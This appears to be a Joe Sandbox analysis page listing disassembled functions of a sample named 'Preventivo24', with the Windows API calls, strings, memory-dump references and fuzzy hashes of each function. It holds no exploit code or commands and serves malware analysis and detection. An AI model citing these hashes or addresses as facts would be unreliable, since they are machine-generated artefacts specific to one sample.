Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Heap$FreeProcess$FormatMessage
String ID:
API String ID: 1606019998-0
Opcode ID: 81b9724d128e3feac9cef16c8486448aeef152b6afd15ad8b6eca68952168c40
Instruction ID: 30df666804e203a94d126f52d0708a260b04dd73b1b7e7f25f17fcba184488ad
Opcode Fuzzy Hash: 81b9724d128e3feac9cef16c8486448aeef152b6afd15ad8b6eca68952168c40
Instruction Fuzzy Hash: 6C1130B1A44219ABEF10EF94CC45BEFBBB8EB04B14F100519F510BB2C0DBB599048B91

Uniqueness

Uniqueness Score: -1.00%

Function 00EAE1B0 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00EAE1BA
SendMessageW.USER32(?,?,?,0000102B), ref: 00EAE211
SendMessageW.USER32(?,?,?,0000102B), ref: 00EAE264
SendMessageW.USER32(?,00001043,00000000,00000000), ref: 00EAE279
SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00EAE28A

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 04c00c19f9c7a643292c509a81d9322625d9228eb6332cee5733dc9c43d766ea
Instruction ID: 815543d1d212d6178cf2f0c0e4e3f5f8d21327cc8859a66915cc0b387977e63f
Opcode Fuzzy Hash: 04c00c19f9c7a643292c509a81d9322625d9228eb6332cee5733dc9c43d766ea
Instruction Fuzzy Hash: 07214D31859786ABE320CF40CD45B1ABBF5BFDE718F206B1EF19421198E7B19584CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00EBA840 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,RichEdit20W,?,?,00000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 00EBAA1B
SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00EBAA2A
SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00EBAA36

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Strings

RichEdit20W, xrefs: 00EBAA13

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend$AllocateCreateHeapWindow
String ID: RichEdit20W
API String ID: 2359350451-4173859555
Opcode ID: bc950e1b6cc6dfaf5cc588f3456c48d1dd29d13f29d7593cb85e572873b3aa18
Instruction ID: 73bd38ed24d952be8bd2a631afec6f4681bece202e1c8c92bd75cd411bada5f0
Opcode Fuzzy Hash: bc950e1b6cc6dfaf5cc588f3456c48d1dd29d13f29d7593cb85e572873b3aa18
Instruction Fuzzy Hash: 09C17631A002289FDB18DFA8C895BEEBBB5EB48314F14416AE915B7390DB75A801CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00EB4BD0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 234windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Part of subcall function 00F990D0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,00000000,?,00EAD728,?,80004005,?), ref: 00F99157
Part of subcall function 00F990D0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F99191

SendMessageW.USER32(?,00001036,00000004,00000004), ref: 00EB4DA1
SendMessageW.USER32(?,00001036,00000400,00000400), ref: 00EB4DBC
SendMessageW.USER32(?,00001061,00000000,?), ref: 00EB4E1C

Strings

QuickSelectionList, xrefs: 00EB4CB8, 00EB4CCA, 00EB4CD4

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend$AllocateHeapWindow
String ID: QuickSelectionList
API String ID: 3168177373-3633591268
Opcode ID: 98bb1aaae1c652a5afba5f12cfa7b7f61801192066ea4c214e707525f1960d67
Instruction ID: 5e84a4202d244e10fb5c451976bd19fb81d85f20fa4277a228d4b0d0a95607fb
Opcode Fuzzy Hash: 98bb1aaae1c652a5afba5f12cfa7b7f61801192066ea4c214e707525f1960d67
Instruction Fuzzy Hash: 4D81BC71A002099FDB14DF64C884BAEBBF5FF88324F04052AF925A7381DB34A944CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FF7970 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,B5580983,?,80000002,80000002), ref: 00FF79C3
CloseHandle.KERNEL32(?,B5580983,80000002,?,00000000,01100E53,000000FF,?,80004005,?,80000002), ref: 00FF7B60
CloseHandle.KERNEL32(00000000,B5580983,80000002,?,00000000,01100E53,000000FF,?,80004005,?,80000002), ref: 00FF7B8F

Strings

LOG, xrefs: 00FF7A37

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CloseHandle$FileModuleName
String ID: LOG
API String ID: 3884789274-429402703
Opcode ID: d11fe4a326ddbc339824b1be3195b1238d7399b287987c8d0b7dabe2e3f30a10
Instruction ID: d7bf53fffd7fd583ac239d3f42b56d6482e5230456cd906f521c43f235ac0322
Opcode Fuzzy Hash: d11fe4a326ddbc339824b1be3195b1238d7399b287987c8d0b7dabe2e3f30a10
Instruction Fuzzy Hash: 3361C371A04348DFDB24EF28C8447AEB7F5FF44710F154669E91ADB7A0E7B49A048B90

Uniqueness

Uniqueness Score: -1.00%

Function 01008900 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,B5580983), ref: 01008937

Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,00000000,?,011D0080,00FF7258,?), ref: 00FA4468
Part of subcall function 00FA4450: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 00FA449A

Strings

*.*, xrefs: 010089CD, 010089E8
.jar, xrefs: 01008D9F
.pack, xrefs: 01008CC1

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ByteCharMultiWide$ObjectSingleWait
String ID: *.*$.jar$.pack
API String ID: 3339361032-3892993289
Opcode ID: 1b94830c7c4c6843e506ccd86170a754882c0f58951054ca9105e724862842f5
Instruction ID: c41b04813056f53e9f3daa143a00e8d6c0c8ddfed226b26dc8bc917d5b2be593
Opcode Fuzzy Hash: 1b94830c7c4c6843e506ccd86170a754882c0f58951054ca9105e724862842f5
Instruction Fuzzy Hash: 1E618370E006098FEB15DFA8C894B9EBBF5FF48324F14816AE825A73C1DB349941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E92AA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00E92AE4
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00E92AEA

Strings

combase.dll, xrefs: 00E92ADF
RoOriginateLanguageException, xrefs: 00E92ADA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoOriginateLanguageException$combase.dll
API String ID: 2574300362-3996158991
Opcode ID: 2f2264656e7b94664508827c0ccf5561a99cdc43fe6021d31e64ebb9f47bcc6c
Instruction ID: cb712daae7d2bb0f663b3b42ad8629aa79477b93472693be3db20f14277eae9b
Opcode Fuzzy Hash: 2f2264656e7b94664508827c0ccf5561a99cdc43fe6021d31e64ebb9f47bcc6c
Instruction Fuzzy Hash: B831567190121AAFCF25DFA4C855BEEBBF4FB04754F10022AE961B72C0E7755A44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F98FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F99580: GetProcAddress.KERNEL32(SetWindowTheme), ref: 00F9964D
Part of subcall function 00F99580: SendMessageW.USER32(?,00001036,00010000,00010000), ref: 00F99698

CreateWindowExW.USER32(80000000,SysListView32,?,00000000,?,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F99022
SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00F9903A
SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00F99046

Part of subcall function 00E9A370: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00E9A3B2

Strings

SysListView32, xrefs: 00F99019

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend$Window$AddressCreateLongProc
String ID: SysListView32
API String ID: 5470851-78025650
Opcode ID: d3994f9dd5dbbd0ddef1c1e5427efa7dfe42e717a50b67626e24f13c67261ee7
Instruction ID: c4d865d78e503277a3b796c7468667f233809fb32af877459e512d61cfe31244
Opcode Fuzzy Hash: d3994f9dd5dbbd0ddef1c1e5427efa7dfe42e717a50b67626e24f13c67261ee7
Instruction Fuzzy Hash: B9117C31306210BFD6299B25CC05F5BFBA9FF89750F054619FA05A7290C7B1A940CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6540 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0108AB55: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB60
Part of subcall function 0108AB55: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B4A6,011CF53C,B5580983,?,?,010B207D,000000FF,?,01003A5D,B5580983,?), ref: 0108AB9A

LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 00FC659E
GetProcAddress.KERNEL32(00000000), ref: 00FC65A5

Part of subcall function 0108AB04: AcquireSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB0E
Part of subcall function 0108AB04: ReleaseSRWLockExclusive.KERNEL32(011CE928,?,?,00E8B517,011CF53C,01115440), ref: 0108AB41
Part of subcall function 0108AB04: WakeAllConditionVariable.KERNEL32(011CE924,?,?,00E8B517,011CF53C,01115440), ref: 0108AB4C

Strings

SymFromAddr, xrefs: 00FC6594
Dbghelp.dll, xrefs: 00FC6599

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$AddressConditionLibraryLoadProcVariableWake
String ID: Dbghelp.dll$SymFromAddr
API String ID: 1702099962-642441706
Opcode ID: eacf30db0b9e2d1b4f9e693f346f5e257a5f636af7334f29888f33140943060f
Instruction ID: 81117fdf1aaa6ee82ba550842e8f281f9816c0ad0d9a94a034a4e5b79a6f1f62
Opcode Fuzzy Hash: eacf30db0b9e2d1b4f9e693f346f5e257a5f636af7334f29888f33140943060f
Instruction Fuzzy Hash: A8019AB1A49B05EFCB68CF68EA46B49B7B6E708B21F140739E83197784D73468408F11

Uniqueness

Uniqueness Score: -1.00%

Function 0108F35C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0108F30D,?,?,00000000,?,?,?,0108F437,00000002,FlsGetValue,0113CCF8,FlsGetValue), ref: 0108F369
GetLastError.KERNEL32(?,0108F30D,?,?,00000000,?,?,?,0108F437,00000002,FlsGetValue,0113CCF8,FlsGetValue,?,?,0108C22B), ref: 0108F373
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0108F39B

Strings

api-ms-, xrefs: 0108F380

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 8a446a86d71f58519449c7f522dc1dea23a28d13a1942ecdc1eddd037071f5d3
Instruction ID: ea34ae738c85b41f7fc12e2adbb29c3da3873d311c02e8ea13ffe49b9a9b364d
Opcode Fuzzy Hash: 8a446a86d71f58519449c7f522dc1dea23a28d13a1942ecdc1eddd037071f5d3
Instruction Fuzzy Hash: 18E0DF3028430AFBEF612E72EC06B693E99AB00B44F10C070FACDB81D1D76296509A90

Uniqueness

Uniqueness Score: -1.00%

Function 00EAD550 Relevance: 6.3, APIs: 4, Instructions: 337windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00EAD6CD
SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00EAD6E6

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Part of subcall function 00F990D0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,00000000,?,00EAD728,?,80004005,?), ref: 00F99157
Part of subcall function 00F990D0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F99191

SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00EAD823
SendMessageW.USER32(?,00001061,00000000,00000005), ref: 00EAD91F

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: MessageSend$AllocateHeapWindow
String ID:
API String ID: 3168177373-0
Opcode ID: 50e9f7f49717560f2d38c3cbdf398bbab7798f6f66dbc0b0e39b51014fb30fef
Instruction ID: bbf0a7472c03bfcec432295ddc8e677863dd82fb41002c55541d95b399206ba1
Opcode Fuzzy Hash: 50e9f7f49717560f2d38c3cbdf398bbab7798f6f66dbc0b0e39b51014fb30fef
Instruction Fuzzy Hash: 99D17D71A006099FDB18DFA8C985BEEFBB5FF49314F104219E426BB280DB75A944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E982F0 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 00E983D8
SysFreeString.OLEAUT32(00000000), ref: 00E9842C
SysFreeString.OLEAUT32(00000000), ref: 00E9844E
SysFreeString.OLEAUT32(00000000), ref: 00E985E0

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 65209dc5b82fddbda186234444abdd677795e95af6a4954348d848ccd9a4d9fe
Instruction ID: 192fffcd62de85d45d740e3b97f914bbfebac9344e5f3517887ec567e3f1099a
Opcode Fuzzy Hash: 65209dc5b82fddbda186234444abdd677795e95af6a4954348d848ccd9a4d9fe
Instruction Fuzzy Hash: FAB15D71A0021A9FDF14DF64C944BAEBBB8FF49714F104169E925E7390DB34AE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E9E380 Relevance: 6.2, APIs: 4, Instructions: 228COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00E9E42A
SysFreeString.OLEAUT32(00000000), ref: 00E9E470

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
